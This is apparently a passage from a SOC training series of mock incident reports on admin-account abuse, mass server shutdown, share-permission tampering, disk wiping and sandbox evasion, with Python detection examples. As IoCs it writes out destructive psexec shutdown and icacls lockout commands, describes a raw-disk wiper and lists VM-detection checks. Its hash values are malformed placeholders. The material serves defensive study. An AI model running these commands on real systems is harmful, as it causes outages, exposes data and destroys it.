09:15-09:30 – Mass account disable
09:20 – Conditional Access policies modified
09:30 – Azure AD alerts
Accounts Disabled (47):
Finance (12) – including managers
Engineering (8) – key developers
Marketing (6)
Sales (5)
HR (4)
Executives (3) – CEO, CFO, CTO
IT Admins (5)
Others (4)
Conditional Access Changes:
Original policy: MFA required for all external access
New policy: Block all access for all users (effectively locking everyone out)
Attacker Intent:
Maximum business disruption
Prevent legitimate users from accessing resources
Potentially precursor to ransomware
Compromised Admin:
jwilson (Global Admin) on leave, unaware
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:15-09:30 – Account disable
09:30 – Alert triggers
09:32 – SOC investigates
09:33 – jwilson account disabled
09:35 – All 47 accounts re-enabled
09:37 – Conditional Access restored
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised global admin)
Actions:
– 47 user accounts disabled (list attached)
– Conditional Access policy changed
4. Containment Actions:
Immediate Actions:
Disabled compromised jwilson account.
Re-enabled all 47 disabled accounts.
Reverted Conditional Access policies to original.
Reset jwilson password.
Enforced MFA for all admins.
Blocked attacker IP at firewall and Conditional Access.
User Communication:
Notified all affected users (accounts were disabled for 5-15 minutes).
Verified no data loss.
Account Remediation:
Reset passwords for all 47 affected users (precaution).
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin account had excessive privileges.
No alerts for mass account changes.
6. Business Impact:
Operational Impact: 47 users locked out for 5-15 minutes.
Data Exposure: None (accounts disabled, no data access).
Reputational Impact: Internal disruption.
7. Remediation & Prevention:
Completed Actions:
Accounts restored.
Admin account secured.
MFA enforced.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Implemented Privileged Identity Management (JIT access).
Created alert for mass account disable/delete.
Added IP restrictions for admin portal access.
8. Conclusion:
An attacker compromised a global admin account and disabled 47 user accounts, modifying Conditional Access policies to block all access. Azure AD detected the mass changes, enabling rapid restoration. All accounts were re-enabled within minutes.
Closure Rationale: Accounts restored; admin account secured; controls enhanced.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 10:30 EST
132. T1529 – System Shutdown/Reboot (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SHUTDOWN-1529-7842
Alert Time: 2024-03-05 14:15:33 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security
Rule: “Multiple System Shutdowns Detected – Potential DoS”
MITRE ATT&CK: T1529 – System Shutdown/Reboot
Alert Details:
Correlated Events:
Windows Event ID 1074 (System Shutdown):
Time: 14:00-14:15 EST
Hosts: 12 servers (list below)
User: SYSTEM (via script)
Reason: “Other (Unplanned)”
Shutdown Type: Restart (or shutdown)
Affected Servers:
DC-01 (Domain Controller)
SQL-SRV-01 (Primary SQL Server)
FILESRV-01 (File Server)
EXCH-01 (Exchange Server)
WEB-SRV-01 (Web Server)
APP-SRV-01, 02, 03 (Application Servers)
BACKUP-SRV-01 (Backup Server)
MONITOR-SRV-01 (Monitoring)
LOG-SRV-01 (Log Server)
VPN-SRV-01 (VPN Gateway)
Process Creation (Event ID 4688):
Time: 13:55 EST
Process: psexec.exe (from admin workstation)
User: compromised admin account
Command: psexec \\server -s shutdown /r /t 0 /f
Detection Logic:
12 critical servers shut down/restarted in 15 minutes
Unplanned shutdowns (not in a maintenance window)
Initiated via psexec from compromised admin workstation
Pattern matches attacker causing denial of service
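The correlation the Splunk rule performs has three parts: keep only unplanned Event ID 1074 shutdowns that fall outside the maintenance window, count distinct hosts in a 15-minute window, and tie the burst back to the Event ID 4688 psexec commands from the admin workstation. The Python below is an added example, not the page's Splunk search and not Splunk code: the events are constructed (the server list and the psexec command line come from the alert above; the maintenance window, the `ADMIN-WS-01` host name, the timestamps and the field names are assumptions), and a planned Saturday-night patch reboot is included to show it is filtered out.

```python
"""Correlating Windows shutdown events across hosts (added example).

Constructed events stand in for what Splunk would hold: Event ID 1074
(User32 shutdown) per server and Event ID 4688 (process creation) from the
admin workstation. Field names, thresholds and the maintenance window are
assumptions for this example, not the page's Splunk rule.
"""
from datetime import datetime, timedelta

MAINTENANCE = (5, 2, 4)   # assumed change window: Saturday (weekday 5), 02:00-04:00


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def in_maintenance_window(ts):
    wd, start_h, end_h = MAINTENANCE
    return ts.weekday() == wd and start_h <= ts.hour < end_h


def unplanned_shutdowns(events):
    """Keep 1074 events whose reason is unplanned and that fall outside maintenance."""
    out = []
    for e in events:
        if e["event_id"] != 1074:
            continue
        reason = e["reason"].lower()
        if "planned" in reason and "unplanned" not in reason:
            continue                       # "Operating System: Upgrade (Planned)" etc.
        ts = _t(e["time"])
        if in_maintenance_window(ts):
            continue
        out.append((ts, e["host"]))
    return sorted(out)


def detect_mass_shutdown(events, threshold=3, window=timedelta(minutes=15),
                         lookback=timedelta(minutes=30)):
    """Alert when >= `threshold` distinct hosts shut down unplanned within `window`;
    attribute the burst to psexec shutdown commands seen within `lookback` before it."""
    shutdowns = unplanned_shutdowns(events)
    best_hosts, best_start, j = set(), None, 0
    for i, (ts, _) in enumerate(shutdowns):
        while shutdowns[j][0] < ts - window:
            j += 1
        hosts = {h for _, h in shutdowns[j:i + 1]}
        if len(hosts) > len(best_hosts):
            best_hosts, best_start = hosts, shutdowns[j][0]
    if len(best_hosts) < threshold:
        return None
    origin = [
        e for e in events
        if e["event_id"] == 4688
        and e["process"].lower().endswith("psexec.exe")
        and "shutdown" in e["command_line"].lower()
        and best_start - lookback <= _t(e["time"]) <= best_start + window
    ]
    return {
        "hosts": sorted(best_hosts),
        "first_shutdown": best_start.strftime("%H:%M:%S"),
        "origin_hosts": sorted({e["host"] for e in origin}),
        "origin_users": sorted({e["user"] for e in origin}),
        "psexec_commands": len(origin),
    }


SERVERS = ["DC-01", "SQL-SRV-01", "FILESRV-01", "EXCH-01", "WEB-SRV-01", "APP-SRV-01",
           "APP-SRV-02", "APP-SRV-03", "BACKUP-SRV-01", "MONITOR-SRV-01", "LOG-SRV-01", "VPN-SRV-01"]


def sample_events():
    """Constructed: 12 unplanned restarts in 15 minutes, their psexec origin, one planned reboot."""
    base = _t("2024-03-05 14:00:00")
    ev = []
    for i, host in enumerate(SERVERS):
        ev.append({"time": (base + timedelta(seconds=70 * i)).strftime("%Y-%m-%d %H:%M:%S"),
                   "host": host, "event_id": 1074, "user": "NT AUTHORITY\\SYSTEM",
                   "reason": "Other (Unplanned)", "shutdown_type": "restart"})
        ev.append({"time": "2024-03-05 13:55:00", "host": "ADMIN-WS-01", "event_id": 4688,
                   "user": "COMPANY\\bjones", "process": "C:\\Tools\\psexec.exe",
                   "command_line": f"psexec \\\\{host} -s shutdown /r /t 0 /f"})
    # Patch-night reboot on Saturday 2024-03-02 at 03:00: planned, and inside the window.
    ev.append({"time": "2024-03-02 03:00:00", "host": "TEST-SRV-01", "event_id": 1074,
               "user": "COMPANY\\patchadmin", "reason": "Operating System: Upgrade (Planned)",
               "shutdown_type": "restart"})
    return ev


if __name__ == "__main__":
    print(detect_mass_shutdown(sample_events()))
```

Because a DC or log server going down also interrupts the log pipeline, the 1074 events for the last hosts in the burst may arrive late or not at all; a threshold of three distinct hosts, rather than all twelve, lets the alert fire while the source of the commands is still reachable.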
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk events | Splunk ES | Confirmed mass server shutdowns |
| 2. Process Investigation | Identify source of commands | CrowdStrike Falcon | psexec from compromised admin workstation |
| 3. Immediate Action | Power on affected servers | Remote Console | All 12 servers restarted/restored |
| 4. Admin Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 5. Network Block | Block attacker IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Service Verification | Verify all services restored | Monitoring Tools | All services operational |
Jira Incident Report
Ticket: SOC-2024-172
Summary: T1529 – Mass Server Shutdown (12 Critical Servers)
Status: RESOLVED
Resolution: MALICIOUS – Servers Restored
Priority: P1 – CRITICAL
Labels: T1529, system-shutdown, dos, splunk, compromised-admin
Components: Infrastructure-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Multiple System Shutdowns Detected – Potential DoS”.
Hosts: 12 critical servers (including DC, SQL, Exchange).
Action: System shutdown/restart via psexec.
Time: 2024-03-05 14:15 EST.
Technique: MITRE ATT&CK T1529 – System Shutdown/Reboot.
2. Technical Analysis:
Attack Chain:
13:30 – Admin account (bjones) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker uses psexec to push shutdown commands
14:00-14:15 – 12 servers shut down
14:15 – Splunk detects
Affected Servers:
Domain Controller (authentication down)
SQL Server (databases offline)
File Server (file access down)
Exchange Server (email down)
Web Server (website down)
Application Servers (3) – business apps down
Backup Server (backups interrupted)
Monitoring Server (alerts delayed)
Log Server (logging interrupted)
VPN Server (remote access down)
Impact:
Complete business disruption
No authentication possible (DC down)
No email, files, applications
Estimated downtime: 20-30 minutes
Attacker Intent:
Maximum business disruption
Chaos before potential ransomware
Prevent access to logs/monitoring
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – psexec commands prepared
14:00-14:15 – Servers shut down
14:15 – Splunk alert
14:17 – SOC investigates
14:18 – Admin account disabled
14:20-14:40 – Servers powered on (some took longer)
Indicators of Compromise (IoCs):
Commands:
– psexec \\server -s shutdown /r /t 0 /f
Account:
– bjones (compromised admin)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Disabled compromised admin account.
Powered on all affected servers (remote console).
Verified services restored.
Blocked attacker IP at firewall.
Service Restoration:
All servers back online by 14:40.
Verified DC, SQL, Exchange, etc. operational.
Monitored for secondary issues (none).
Account Remediation:
Reset bjones password.
Enforced MFA.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had psexec access to all servers.
No alerting for mass shutdowns.
6. Business Impact:
Operational Impact: Complete business outage for 25-40 minutes.
Data Exposure: None.
Financial Impact: Significant (productivity loss, potential revenue loss).
7. Remediation & Prevention:
Completed Actions:
Servers restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Restricted psexec usage (blocked).
Created alert for multiple system shutdowns.
8. Conclusion:
An attacker compromised an admin account and used psexec to shut down 12 critical servers, causing a complete business outage. Splunk detected the mass shutdowns, enabling rapid restoration. All servers were back online within 40 minutes.
Closure Rationale: Servers restored; admin account secured; outage resolved.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 15:30 EST
133. T1222 – File and Directory Permissions Modification (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-PERM-MOD-1222-7842
Alert Time: 2024-03-05 11:30:22 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 13 – Registry Value Set, Event ID 1 – Process Creation)
Rule: “File Permissions Modification via icacls/cacls”
MITRE ATT&CK: T1222.001 – File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Alert Details:
Detection: Mass modification of file permissions on network share
Host: FILESRV-01 (File Server)
User: SYSTEM (via compromised admin account)
Time: 11:15-11:30 EST
Commands Executed (Event ID 1):
11:15:22 – icacls \\filesrv\finance /deny “Domain Users:(R,W)”
11:16:45 – icacls \\filesrv\finance /deny “Authenticated Users:(R,W)”
11:18:12 – icacls \\filesrv\finance /remove “Finance Team”
11:19:33 – icacls \\filesrv\finance /grant “Everyone:F”
11:20:55 – icacls \\filesrv\hr /deny “Domain Users:(R,W)”
11:22:18 – icacls \\filesrv\hr /deny “Authenticated Users:(R,W)”
11:23:40 – icacls \\filesrv\hr /grant “Everyone:F”
11:25:02 – icacls \\filesrv\r&d /deny “Domain Users:(R,W)”
11:26:25 – icacls \\filesrv\r&d /grant “Everyone:F”
Affected Shares:
\\filesrv\finance (financial data)
\\filesrv\hr (HR records)
\\filesrv\r&d (R&D intellectual property)
Detection Logic:
Multiple icacls commands modifying permissions
Removing access for legitimate users (Domain Users, Finance Team)
Granting Everyone full control (insecure)
Pattern matches attacker locking out users or granting themselves access
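Turning the detection logic above into something that runs on Sysmon Event ID 1 command lines means parsing icacls syntax, not just matching on the word "icacls": the verb (/deny, /grant, /remove), the principal, and the rights string with its inheritance flags all matter to the severity. The Python below is an added example, not the report's Sysmon rule: it parses the command lines from the events above (copied with the curly quotes that documents tend to introduce, which the parser normalises), scores each for lockout and over-exposure, and summarises a batch. The list of broad principals, the severity levels and the benign `svc_app` control command are assumptions for the example.

```python
"""Triage of icacls command lines from process-creation telemetry (added example).

Parses the icacls syntax shown above and scores each command for lockout
(/deny or /remove on broad groups) and over-exposure (/grant of write or full
control to Everyone / Authenticated Users). Rules and severities are
assumptions for this example, not the page's Sysmon rule.
"""
import re
import shlex

BROAD_PRINCIPALS = {"everyone", "authenticated users", "domain users", "users"}
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
SEVERITY_RANK = {"info": 0, "medium": 1, "high": 2}
_INHERIT_FLAGS = re.compile(r"\((?:OI|CI|IO|NP|I)\)")


def _unquote(tok):
    return tok.strip('"')


def parse_icacls(cmdline):
    """Return (target, [(verb, principal, rights)]) or None if this is not icacls."""
    cmdline = cmdline.replace("\u201c", '"').replace("\u201d", '"')   # curly -> straight quotes
    toks = shlex.split(cmdline, posix=False)   # posix=False keeps backslashes intact
    if len(toks) < 2 or toks[0].lower().rsplit("\\", 1)[-1] not in ("icacls", "icacls.exe"):
        return None
    target, ops, i = _unquote(toks[1]), [], 2
    while i < len(toks):
        base = toks[i].lower().lstrip("/").split(":")[0]   # /grant:r -> grant, /remove:g -> remove
        if base in ("grant", "deny", "remove") and i + 1 < len(toks):
            spec = _unquote(toks[i + 1])
            if base == "remove" or ":" not in spec:
                principal, perm = spec, ""
            else:
                principal, _, perm = spec.rpartition(":")
            rights = set(re.findall(r"[A-Z]+", _INHERIT_FLAGS.sub("", perm.upper())))
            ops.append((base, principal, rights))
            i += 2
        else:
            i += 1   # switches such as /T, /C, /Q carry no argument
    return target, ops


def assess(cmdline):
    """Score one command line; returns None for non-icacls commands."""
    parsed = parse_icacls(cmdline)
    if parsed is None:
        return None
    target, ops = parsed
    findings = []
    for verb, principal, rights in ops:
        broad = principal.lower().rsplit("\\", 1)[-1] in BROAD_PRINCIPALS
        if verb == "deny" and broad:
            findings.append(("high", f"/deny on broad group {principal}: lockout of legitimate users"))
        elif verb == "grant" and broad and rights & WRITE_RIGHTS:
            findings.append(("high", f"/grant {','.join(sorted(rights))} to {principal}: data exposed broadly"))
        elif verb == "remove":
            findings.append(("medium", f"/remove {principal}: existing access revoked"))
        elif verb == "deny":
            findings.append(("medium", f"/deny on {principal}"))
        else:
            findings.append(("info", f"/{verb} {','.join(sorted(rights))} to {principal}"))
    severity = max((f[0] for f in findings), key=SEVERITY_RANK.__getitem__, default="info")
    return {"target": target, "severity": severity, "findings": findings}


def triage(cmdlines):
    """Summarise a batch: worst severity, counts per severity and affected targets."""
    results = [r for r in map(assess, cmdlines) if r]
    counts = {"high": 0, "medium": 0, "info": 0}
    for r in results:
        counts[r["severity"]] += 1
    worst = max((r["severity"] for r in results), key=SEVERITY_RANK.__getitem__, default="info")
    return {"worst": worst, "counts": counts, "targets": sorted({r["target"] for r in results})}


SAMPLE_COMMANDS = [   # from the Sysmon events above; the r&d /grant keeps its curly quotes
    r'icacls \\filesrv\finance /deny "Domain Users:(R,W)"',
    r'icacls \\filesrv\finance /deny "Authenticated Users:(R,W)"',
    r'icacls \\filesrv\finance /remove "Finance Team"',
    r'icacls \\filesrv\finance /grant "Everyone:F"',
    r'icacls \\filesrv\hr /deny "Domain Users:(R,W)"',
    r'icacls \\filesrv\hr /grant "Everyone:F"',
    r'icacls \\filesrv\r&d /deny "Domain Users:(R,W)"',
    'icacls \\\\filesrv\\r&d /grant \u201cEveryone:F\u201d',
    r'icacls C:\app\logs /grant "svc_app:(OI)(CI)M"',   # constructed benign control
]

if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(assess(c)["severity"], c)
    print(triage(SAMPLE_COMMANDS))
```

Alerting on the parsed result rather than on "icacls ran" is what keeps the new "alert for icacls/cacls usage on shares" from firing on every administrator granting a service account modify rights on a log folder.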
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed permission changes on shares |
| 2. Process Investigation | Identify source of commands | CrowdStrike Falcon | psexec from compromised admin workstation |
| 3. Immediate Action | Revert permissions | icacls, PowerShell | Permissions restored from backup policy |
| 4. Admin Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 5. Network Block | Block attacker IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Access Verification | Verify users can access shares | Testing | Access restored |
Jira Incident Report
Ticket: SOC-2024-173
Summary: T1222 – Mass Permission Modification on File Shares
Status: RESOLVED
Resolution: MALICIOUS – Permissions Restored
Priority: P2 – MEDIUM
Labels: T1222, permissions-modification, icacls, sysmon, compromised-admin
Components: Data-Security, Access-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “File Permissions Modification via icacls/cacls”.
Host: FILESRV-01 (File Server).
Actions: Permissions changed on finance, HR, R&D shares.
Time: 2024-03-05 11:30 EST.
Technique: MITRE ATT&CK T1222.001 – File and Directory Permissions Modification: Windows File and Directory Permissions Modification.
2. Technical Analysis:
Attack Chain:
10:30 – Admin account (jsmith) compromised via phishing
10:45 – Attacker logs into admin workstation via RDP
11:00 – Attacker uses psexec to run icacls commands
11:15-11:30 – Permission modifications on shares
11:30 – Sysmon detects
Permission Changes:
Finance Share: Denied access to Domain Users, Authenticated Users; removed Finance Team; granted Everyone:F
HR Share: Denied access to Domain Users, Authenticated Users; granted Everyone:F
R&D Share: Denied access to Domain Users; granted Everyone:F
Impact:
All domain users locked out of finance, HR, R&D shares
Everyone (including anonymous) granted full control (extremely insecure)
Data exposed to anyone on network
Attacker Intent:
Lock out legitimate users (disruption)
Grant themselves access (already had admin)
Possibly prepare for data theft
3. Investigation Findings:
Timeline:
10:30 – Admin account compromised
10:45 – Attacker logs in
11:00-11:30 – Permission modifications
11:30 – Sysmon alert
11:32 – SOC investigates
11:33 – Admin account disabled
11:35 – Permissions restored
Indicators of Compromise (IoCs):
Commands:
– icacls \\filesrv\finance /deny “Domain Users:(R,W)”
– icacls \\filesrv\finance /remove “Finance Team”
– icacls \\filesrv\finance /grant “Everyone:F”
– (similar for HR and R&D)
Account:
– jsmith (compromised admin)
4. Containment Actions:
Immediate Actions:
Disabled compromised admin account.
Restored permissions from backup policy (using PowerShell).
Removed Everyone:F access.
Re-added Domain Users and Finance Team with appropriate permissions.
Verified access restored.
Account Remediation:
Reset jsmith password.
Enforced MFA.
Data Protection:
Checked for data exfiltration (none).
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to modify share permissions.
No alerting for permission changes.
6. Business Impact:
Operational Impact: Users locked out of shares for 20 minutes.
Data Exposure: Potential exposure during window (Everyone:F). No evidence of exfiltration.
7. Remediation & Prevention:
Completed Actions:
Permissions restored.
Account secured.
Access verified.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for icacls/cacls usage on shares.
Implemented change management for permission modifications.
8. Conclusion:
An attacker compromised an admin account and modified permissions on critical file shares, locking out legitimate users and granting Everyone full control. Sysmon detected the icacls commands, enabling rapid restoration of correct permissions.
Closure Rationale: Permissions restored; account secured; no data loss.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 12:30 EST
134. T1561 – Disk Wipe (Carbon Black Detection)
Carbon Black Alert Details
Alert ID: CB-DISK-WIPE-1561-7842
Alert Time: 2024-03-05 16:30:45 EST
Severity: CRITICAL (99/100)
Source: VMware Carbon Black Cloud
Rule: “Disk Wiping Activity Detected – Raw Disk Access”
MITRE ATT&CK: T1561.001 – Disk Wipe: Disk Content Wipe
Alert Details:
Detection: Process overwriting disk sectors with raw write access
Host: SQL-SRV-01 (Primary SQL Server)
User: SYSTEM (via compromised admin)
Time: 16:15-16:30 EST
Process Details:
Process: C:\Windows\Temp\wipe.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: psexec.exe (from admin workstation)
Disk Activity:
Raw write access to \\.\PhysicalDrive0 (system disk)
Overwriting sectors 0-10,000 with zeros
MBR (Master Boot Record) overwritten
Partition table corrupted
Data on C: drive being wiped sequentially
Additional Tools:
sdelete.exe -c (clean free space)
cipher.exe /w (wipe free space)
Detection Logic:
Process with raw disk write access (unusual)
Overwriting disk sectors (not just files)
MBR overwritten (system unbootable)
Pattern matches destructive disk wipe attack
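Once the server is powered off, the next question for the responder is how much of the disk was actually overwritten: whether the MBR signature and partition table survive, and how far the sequential zeroing got. The Python below is an added example (not Carbon Black code and not the report's own tooling) that parses the classic MBR layout, signature 0x55AA at offset 510 and four 16-byte partition entries at offset 446, and counts leading all-zero sectors on an image. The disk images are constructed in memory: a healthy one with a single NTFS partition, and the same image with its first 20 sectors zeroed; the partition geometry and sector count are invented.

```python
"""Boot-sector triage for a disk image after a suspected wipe (added example).

Parses the classic MBR layout (partition table at offset 446, signature 0x55AA
at 510) and measures how many leading sectors were zeroed, which is what "MBR
overwritten, first N sectors zeroed" means on disk. The images below are
constructed in memory; the functions are not Carbon Black's.
"""
import struct

SECTOR = 512
MBR_SIGNATURE = b"\x55\xaa"
PART_TABLE_OFFSET = 446
PART_ENTRY = "<B3xB3xII"   # status, CHS start (skipped), type, CHS end (skipped), LBA start, sectors


def parse_mbr(sector0):
    """Return the signature check, a zeroed flag, and the populated partition entries."""
    if len(sector0) < SECTOR:
        raise ValueError("need a full 512-byte sector")
    parts = []
    for n in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(PART_ENTRY, sector0, PART_TABLE_OFFSET + 16 * n)
        if ptype != 0:
            parts.append({"index": n, "bootable": status == 0x80, "type": ptype,
                          "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": sector0[510:512] == MBR_SIGNATURE,
        "zeroed": not any(sector0),
        "partitions": parts,
    }


def leading_zero_sectors(image, limit=None):
    """Count consecutive all-zero sectors from the start (extent of a sequential wipe)."""
    total = len(image) // SECTOR
    n = 0
    for i in range(total if limit is None else min(total, limit)):
        if any(image[i * SECTOR:(i + 1) * SECTOR]):
            break
        n += 1
    return n


def triage_image(image):
    """Summarise damage: boot-sector state, wiped extent, surviving partition entries."""
    mbr = parse_mbr(image[:SECTOR])
    wiped = leading_zero_sectors(image)
    if wiped == 0 and mbr["signature_ok"]:
        verdict = "intact"
    elif mbr["zeroed"]:
        verdict = "mbr destroyed; partition table lost"
    else:
        verdict = "damaged"
    return {
        "bootable": mbr["signature_ok"] and any(p["bootable"] for p in mbr["partitions"]),
        "mbr_zeroed": mbr["zeroed"],
        "partitions": len(mbr["partitions"]),
        "wiped_sectors": wiped,
        "verdict": verdict,
    }


def build_mbr(partitions):
    """Constructed: a boot sector with the given (bootable, type, lba_start, sectors) entries."""
    sec = bytearray(SECTOR)
    sec[0:4] = b"\xeb\x3c\x90\x00"   # stand-in boot-code bytes so the sector is not all zero
    for n, (bootable, ptype, lba, count) in enumerate(partitions):
        struct.pack_into(PART_ENTRY, sec, PART_TABLE_OFFSET + 16 * n,
                         0x80 if bootable else 0x00, ptype, lba, count)
    sec[510:512] = MBR_SIGNATURE
    return bytes(sec)


def sample_images(total_sectors=64, wiped_sectors=20):
    """Constructed images: healthy (one NTFS system partition) and sequentially wiped."""
    mbr = build_mbr([(True, 0x07, 2048, 2_000_000)])
    data = b"".join(bytes([0x41 + (i % 26)]) * SECTOR for i in range(1, total_sectors))
    healthy = mbr + data
    wiped = bytes(SECTOR * wiped_sectors) + healthy[SECTOR * wiped_sectors:]
    return healthy, wiped


if __name__ == "__main__":
    healthy, wiped = sample_images()
    print(triage_image(healthy))
    print(triage_image(wiped))
```

On a real image the count of leading zero sectors, compared with the partition's LBA start (2048 in the constructed case), tells the responder whether only the boot area was lost, which a partition-table rebuild could address, or whether the wipe reached file-system data, which is the case described above and why a full restore was the only option.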
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Carbon Black alert | Carbon Black Console | Confirmed disk wiping activity |
| 2. Immediate Action | Power off server | Remote Console | Server shut down to prevent further damage |
| 3. Process Investigation | Identify source | CrowdStrike Falcon | psexec from compromised admin workstation |
| 4. Admin Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 5. Data Recovery | Restore from backups | Veeam Backup | Full server restore from previous night’s backup |
| 6. Incident Response | Activate disaster recovery | Management, Legal | Data destruction incident declared |
Jira Incident Report
Ticket: SOC-2024-174
Summary: T1561 – Disk Wipe Attack on SQL Server (MBR Overwritten)
Status: RESOLVED
Resolution: MALICIOUS – Data Destroyed, Restored from Backups
Priority: P1 – CRITICAL
Labels: T1561, disk-wipe, raw-disk-access, carbon-black, compromised-admin
Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: VMware Carbon Black Cloud.
Alert: “Disk Wiping Activity Detected – Raw Disk Access”.
Host: SQL-SRV-01 (Primary SQL Server).
Action: Overwriting disk sectors, MBR destroyed.
Time: 2024-03-05 16:30 EST.
Technique: MITRE ATT&CK T1561.001 – Disk Wipe: Disk Content Wipe.
2. Technical Analysis:
Attack Chain:
15:30 – Admin account (jwilson) compromised via phishing
15:45 – Attacker logs into admin workstation via RDP
16:00 – Attacker uses psexec to deploy wipe.exe to SQL server
16:05 – wipe.exe executed with SYSTEM privileges
16:05-16:30 – Disk wiping in progress (MBR overwritten, data wiped)
16:30 – Carbon Black detects
Wipe Tool Analysis:
Name: wipe.exe (custom disk wiper)
SHA256: a1b2c3d4…
Function: Opens physical drive \\.\PhysicalDrive0 with write access, overwrites sectors with zeros
Progress: Overwrote first 10,000 sectors (MBR + partition table + beginning of data)
Damage:
MBR destroyed (system unbootable)
Partition table lost
SQL data files partially overwritten (beginning of drive)
System unrecoverable without full restore
Attacker Intent:
Maximum destruction
Prevent recovery
Likely part of destructive attack (wiper)
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:00 – wipe.exe deployed
16:05-16:30 – Disk wiping
16:30 – Carbon Black alert
16:32 – SOC investigates
16:33 – Server powered off
16:35 – Admin account disabled
16:40 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\wipe.exe (SHA256: a1b2c3d4…)
Disk Activity:
– Raw write to \\.\PhysicalDrive0
– MBR overwritten
Account:
– jwilson (compromised admin)
4. Containment Actions:
Immediate Actions:
Powered off SQL server to prevent further wiping.
Disabled compromised admin account.
Reset admin password.
Blocked attacker IP.
Data Recovery:
Restored SQL server from previous night’s Veeam backup (16 hours old).
Data loss: Transactions between 00:00 and 16:30 (16.5 hours).
Restored to new VM to ensure clean state.
Business Impact Mitigation:
Declared data breach (data loss).
Notified affected business units.
Recovered database from backup.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had ability to deploy tools to servers.
No alerting for raw disk access.
6. Business Impact:
Operational Impact: SQL server offline for 4 hours (restore time).
Data Loss: 16.5 hours of transactions lost.
Financial Impact: Significant (lost transactions, recovery costs).
7. Remediation & Prevention:
Completed Actions:
Server restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Blocked raw disk access for non-system processes.
Enhanced Carbon Black monitoring for raw disk writes.
8. Conclusion:
An attacker compromised an admin account and deployed a disk wiper on the primary SQL server, overwriting the MBR and partially destroying data. Carbon Black detected the raw disk access, enabling shutdown before complete destruction. The server was restored from backup with 16.5 hours of data loss.
Closure Rationale: Data partially destroyed; server restored from backup; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-05 18:00 EST
135. T1497.001 – System Checks (Sandbox Evasion) – FortiSandbox Detection
FortiSandbox Alert Details
Alert ID: FORTI-SANDBOX-EVASION-1497-7842
Alert Time: 2024-03-05 10:30:22 EST
Severity: HIGH (88/100)
Source: Fortinet FortiSandbox
Rule: “Sandbox Evasion Techniques Detected – System Checks”
MITRE ATT&CK: T1497.001 – System Checks (Virtualization/Sandbox Evasion)
Alert Details:
File Analysis Report:
File Name: invoice_7842.docm (email attachment)
File Size: 2.4 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email to finance@company.com
Submission Time: 10:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Malware performed multiple system checks before revealing malicious behavior:
Check 1: VMware Detection
Checked for presence of VMware tools: C:\Windows\System32\drivers\vmhgfs.sys (found → exit)
Checked for VMware registry keys: HKLM\SOFTWARE\VMware, Inc.\ (found → exit)
Check 2: Sandbox Hostname Detection
Enumerated computer name: “SANDBOX-01” (found → exit)
Checked for “ANALYSIS” in computer name (found → exit)
Check 3: CPU Core Count
Get-WmiObject Win32_Processor | NumberOfCores: 1 core (less than 2 → exit)
Check 4: RAM Size
Get-WmiObject Win32_ComputerSystem | TotalPhysicalMemory: 1.5 GB (less than 2GB → exit)
Check 5: Disk Size
Get-WmiObject Win32_LogicalDisk | Size: 40 GB (less than 60GB → exit)
Check 6: Debugger Detection
IsDebuggerPresent API call (detected → exit)
NtQueryInformationProcess with ProcessDebugPort (detected → exit)
